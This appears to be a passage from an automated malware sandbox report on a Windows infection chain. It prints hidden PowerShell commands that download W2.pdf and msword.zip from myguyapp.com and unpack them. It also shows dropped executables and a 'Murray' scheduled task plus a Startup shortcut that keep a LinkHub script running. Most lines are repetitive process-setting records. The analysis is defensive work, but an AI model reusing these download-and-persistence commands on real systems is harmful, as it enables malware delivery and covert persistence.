Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Section loaded: wldp.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

15_2_004062FC

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00BD0DE6 push ecx; ret

38_2_00BD0DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	File created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	File created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C426DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		38_2_00C426DD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BCFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		38_2_00BCFC7C

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
